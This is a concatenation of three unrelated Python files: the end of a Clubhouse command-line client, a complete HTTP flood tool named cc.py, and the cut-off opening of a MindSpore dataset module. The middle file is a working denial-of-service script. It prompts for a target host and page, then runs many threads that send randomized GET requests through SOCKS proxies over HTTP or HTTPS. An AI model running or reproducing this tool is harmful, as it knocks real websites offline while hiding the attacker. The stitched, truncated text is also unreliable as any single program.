getOnlineFriends(client)
elif _menu == 12:
getProfile(client)
elif _menu == 13:
searchClubs(client)
elif _menu == 14:
getTopics(client)
elif _menu == 15:
addInterest(client)
elif _menu == 16:
rmInterest(client)
return
def noTi(client):
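    """ (Clubhouse) -> NoneType
    Print the current account's notifications in a table.
    """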
_res = client.get_notifications()
print(colored("[!] notifications : ",'yellow') + str(_res['count']))
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("Noti_id", style="cyan", justify="right")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("type")
table.add_column("name")
table.add_column("message")
users = _res['notifications']
i = 0
for user in users:
i += 1
if i > int(_res['count']):
break
table.add_row(
str(i),
str(user['notification_id']),
str(user['user_profile']['user_id']),
str(user['user_profile']['username']),
str(user['type']),
str(user['user_profile']['name']),
str(user['message']),
)
console.print(table)
print("=" * 30)
return
def main():
"""
Initialize required configurations, start with some basic stuff.
"""
# Initialize configuration
client = None
user_config = read_config()
user_id = user_config.get('user_id')
user_token = user_config.get('user_token')
user_device = user_config.get('user_device')
name = user_config.get('name')
username = user_config.get('username')
# Check if user is authenticated
if user_id and user_token and user_device:
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
# Check if user is still on the waitlist
_check = client.check_waitlist_status()
if _check['is_waitlisted']:
print("[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Check if user has not signed up yet.
_check = client.me()
if not _check['user_profile'].get("username"):
process_onboarding(client)
_res = client.me()
num_invites = _res['num_invites']
print("=" * 30)
print(colored("Club House Command V1",'yellow'))
print("=" * 30)
print("[!] ID : " + user_id)
print("[!] name : " + name)
print("[!] username : @" + username)
print("[!] invites : " + str(num_invites))
print("=" * 30)
noTi(client)
getOnlineFriends(client)
menu(client)
else:
client = Clubhouse()
user_authentication(client)
main()
if __name__ == "__main__":
try:
main()
except Exception:
# Remove dump files on exit.
file_list = os.listdir(".")
for _file in file_list:
if _file.endswith(".dmp"):
os.remove(_file)
|
cc.py
|
#!/usr/bin/python3
#Coded by Leeon123
import socket
import socks
import time
import random
import threading
import sys
import ssl
print ('''
____ ____ _ _ _ _
/ ___/ ___| / \ | |_| |_ __ _ ___| | __
| | | | _____ / _ \| __| __/ _` |/ __| |/ /
| |__| |__|_____/ ___ \ |_| || (_| | (__| <
\____\____| /_/ \_\__|\__\__,_|\___|_|\_\\
Python3 version 1.2.1 (Support Https)
          Coded by Lee0n123
>---------------------------------------------<
If you want to stop
this script, pls just
close the window.
>---------------------------------------------<''')
useragents=["Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",]
ip = str(input("> Host/Ip:"))
https = str(input("> Https(y/n):"))
url = str(input("> Page you want to attack(default=/)"))# add new function
port = int(input("> Port(Https default is 443):"))
thread_num = int(input("> Threads:"))
out_file = str(input("> Proxy file path(proxy.txt):"))
print ("> Number Of Proxies: %s" %(len(open(out_file).readlines())))
time.sleep(0.3)
multiple = int(input("> Input the Magnification:"))
#For those who don't know what is the page you want to attack :)
if url == '':
url2 = "/"
else:
url2 = str(url)
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
proxies = open(out_file).readlines()
def run():
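    # Build one randomized GET request (random User-Agent and Accept headers) and keep
    # sending it to the target through a SOCKS5 proxy picked from the proxy list,
    # falling back to SOCKS4 on the same proxy when the SOCKS5 attempt fails.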
get_host = "GET " + url2 + " HTTP/1.1\r\nHost: " + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
accept = random.choice(acceptall)
request = get_host + useragent + accept + connection + "\r\n"
proxy = random.choice(proxies).strip().split(":")
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
s.send(str.encode(request))
print (str(proxy[0]+":"+proxy[1])+"<>---------<>Request Send!!!")
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
s.send(str.encode(request))
print (str(proxy[0]+":"+proxy[1])+"<>---------<>Request Send!!!\r\n")
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
print ("<ERROR>----<socks down>")
s.close()
def run2():
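    # Same flood loop as run(), but the proxied socket is wrapped with ssl.wrap_socket()
    # so the request is sent over HTTPS (used when the user answered "y" to Https).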
get_host = "GET " + url2 + " HTTP/1.1\r\nHost: " + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
accept = random.choice(acceptall)
request = get_host + useragent + accept + connection + "\r\n"
proxy = random.choice(proxies).strip().split(":")
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
s = ssl.wrap_socket(socks.socksocket())
s.connect((str(ip), int(port)))
s.send(str.encode(request))
print (str(proxy[0]+":"+proxy[1])+"<>---------<>Request Send!!!")
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
s = ssl.wrap_socket(socks.socksocket())
s.connect((str(ip), int(port)))
s.send(str.encode(request))
print (str(proxy[0]+":"+proxy[1])+"<>---------<>Request Send!!!\r\n")
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
print ("<ERROR>----<socks down>")
s.close()
if https == "y":
for i in range(thread_num):
th = threading.Thread(target = run2)
th.start()
else:
for i in range(thread_num):
th = threading.Thread(target = run)
th.start()
|
datasets.py
|
# Copyright 2019-2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
1. This file is an abstraction of the dataset loading class. It contains
    some basic dataset operations (skip, filter, map, batch, ...).
2. Specific dataset loading classes can be found in datasets_vision.py, datasets_text.py,
    datasets_audio.py, datasets_standard_format.py and datasets_user_defined.py files.
datasets_vision.py: contains vision dataset loading classes.
datasets_text.py: contains text dataset loading classes.
datasets_audio.py: contains audio dataset loading classes.
datasets_standard_format.py: contains standard format loading classes which
any other kinds of datasets can be converted to.
    datasets_user_defined.py: contains basic classes that help users to define
flexible ways to load dataset.
"""
import atexit
import glob
import json
import os
import signal
import stat
import time
import uuid
import multiprocessing
from multiprocessing.pool import RUN, TERMINATE
from enum import Enum
from importlib import import_module
import sys
import threading
import copy
import weakref
import platform
import psutil
import numpy as np
import mindspore._c_dataengine as cde
from mindspore._c_expression import typing
from mindspore import log as logger
from mindspore.parallel._ps_context import _is_role_pserver, _is_role_sched
from mindspore.dataset.engine.offload import GetOffloadModel
import mindspore.dataset.transforms.py_transforms as py_transforms
from mindspore.dataset.text.utils import SentencePieceModel, DE_C_INTER_SENTENCEPIECE_MODE
from mindspore.parallel._utils import _get_device_num
from . import samplers
from .iterators import DictIterator, TupleIterator, DummyIterator, check_iterator_cleanup, _set_iterator_cleanup, \
ITERATORS_LIST, _unset_iterator_cleanup
from .queue import _SharedQueue
from .validators import check_batch, check_shuffle, check_map, check_filter, check_repeat, check_skip, check_zip, \
check_rename, check_device_send, check_take, check_project, \
check_sync_wait, check_zip_dataset, check_add_column, check_concat, check_split, check_bucket_batch_by_length, \
check_save, check_tuple_iterator, check_dict_iterator, check_schema, check_to_device_send
from ..core.config import get_callback_timeout, _init_device_info, get_enable_shared_mem, get_num_parallel_workers
from ..core.datatypes import mstype_to_detype
from ..core.validator_helpers import replace_none
from ..core.py_util_helpers import ExceptionHandler
from ..transforms.py_transforms_util import FuncWrapper
try:
context = import_module("mindspore.context")
except ModuleNotFoundError:
context = None
if platform.system().lower() == "darwin" and multiprocessing.get_start_method() != "fork":
multiprocessing.set_start_method("fork", True)
OffloadToManualOffloadMode = {
None: cde.ManualOffloadMode.UNSPECIFIED,
False: cde.ManualOffloadMode.DISABLED,
True: cde.ManualOffloadMode.ENABLED
}
_train_dataset = None
def _set_training_dataset(dataset):
"""
Set the dataset to be used when training recovery has occurred.
Args:
dataset: the training dataset or iterator
"""
global _train_dataset
_train_dataset = dataset
def _get_training_dataset():
"""
Get the dataset to be used when training recovery has occurred.
Returns:
training dataset/iterator
"""
return _train_dataset
def _reset_training_dataset(step):
"""
Reset the training dataset to the given step number.
Args:
step (int): Global step number.
"""
dataset = _get_training_dataset()
